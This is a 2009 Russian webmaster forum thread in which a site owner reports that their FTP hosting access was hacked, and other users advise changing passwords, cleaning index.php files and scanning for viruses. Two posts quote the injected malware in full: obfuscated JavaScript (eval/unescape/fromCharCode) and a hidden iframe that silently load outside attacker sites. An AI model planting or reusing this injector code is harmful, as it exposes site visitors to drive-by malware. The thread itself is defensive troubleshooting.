Помощник
|
Взломали Ftp доступ к хостингу |
shtrih
|
Сообщение
#1
|
||
|
|
||
|
|||
mr4q |
14.6.2009, 21:58;
Ответить: mr4q
Сообщение
#2
|
|
Ифрейм
<script></script><script>eval(unescape("var f28 = String.fromCharCode(104,116,116,112,58,47,47,101,108,97,110,116,114,97,115,97,11 0,116,114,111,112,101,46,114,117,47,110,105,103,104,116,112,97,114,116,121,46,10 4 ,116,109,108);document.write(unescape('<iframe src=\''+f28+'\'></iframe>'));"));</script> 1. Сменить пароли. 2. Обрыть все index.php и шаблоны и удалить мусор. Сообщение отредактировал mr4q - 14.6.2009, 22:00 -------------------- |
|
|
Olney |
14.6.2009, 22:08;
Ответить: Olney
Сообщение
#3
|
|
shtrih - смените пароли на FTP, почистите файлы и проверьте компьютер на вирусы.
|
|
|
Погодин |
14.6.2009, 22:10;
Ответить: Погодин
Сообщение
#4
|
|
shtrih, удали этот код, проверь компьютер утилитой CureIt! и поменяй пароль на ftp.
-------------------- |
|
|
ecasoft_ru |
14.6.2009, 22:22;
Ответить: ecasoft_ru
Сообщение
#5
|
|
А сами не сливали случайно траф?
-------------------- |
|
|
shtrih
|
Сообщение
#6
|
|
Пароли сменил.
Пароль сложный стоял... перебор исключён. Стояли 2 партнёрки по сливу трафа попандер и 1андер, но они стояли только на двух сайтах, на остальных партнёрок небыло. Посмотрел дату изменения index.php , подчти все файлы были изменены вчера в 11:45 и сегодня он ещё 1 файл в 6:35 менял Сообщение отредактировал shtrih - 14.6.2009, 22:56 |
|
|
Fabregas |
14.6.2009, 22:57;
Ответить: Fabregas
Сообщение
#7
|
|
Пароль сложный стоял... перебор исключён естественно...ftp чаще всего вирусами ломаются, при этом вирус мог быть у вас год назад, а ftp поломать теперь. Было дело... -------------------- |
|
|
shtrih
|
Сообщение
#8
|
|
mr4q, а что за Ифрейм такой? что он делает?
|
|
|
shtrih
|
Сообщение
#9
|
|
вот, ещё такой скрипт отискал..
<iframe src="http://filmbridgelife.cn:8080/index.php" width=146 height=175 style="visibility: hidden"></iframe><script></script><script>eval(unescape("%76%61%72%20%66%32%38%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%31%2c%31%30%38%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%39%37%2c%31%31%35%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%31%31%31%2c%31%31%32%2c%31%30%31%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%31%30%2c%31%30%35%2c%31%30%33%2c%31%30%34%2c%31%31%36%2c%31%31%32%2c%39%37%2c%31%31%34%2c%31%31%36%2c%31%32%31%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%66%32%38%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));</script> интересно, что он делает? |
|
|
zazik |
14.6.2009, 23:58;
Ответить: zazik
Сообщение
#10
|
|
Пользователи в фоновом режиме уходят на другой сайт вроде, сделай то что сказали в первых двух постах и не парься
-------------------- |
|
|
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
Выгрузки из KEYS.SO, SPYWORDS.RU, SERPSTAT.COM, AHREFS.COM, MAJESTIC.COM, доступ в SEMRUSH.COM всё в одном месте - экономия времени и денег |
28 | Germeso | 25634 | 19.10.2019, 21:08 автор: Germeso |
|
Куплю доступ к сервису Linkpad Сбор внешних ссылок |
5 | Kuzzma | 2054 | 11.8.2019, 22:28 автор: Rybakin |
|
Передам доступ к Ahrefs за 1/3 цены месячной подписки | 3 | Tutich | 1979 | 2.4.2019, 11:52 автор: Tutich |
|
Куплю доступ к tz.binet.pro tz.binet.pro |
0 | tehno_music | 2916 | 4.6.2018, 11:45 автор: tehno_music |
|
Куплю доступ к сервисам Пузата | 1 | absoluteness | 2440 | 17.8.2017, 18:59 автор: Silverspam |
Текстовая версия | Сейчас: 29.3.2024, 12:21 |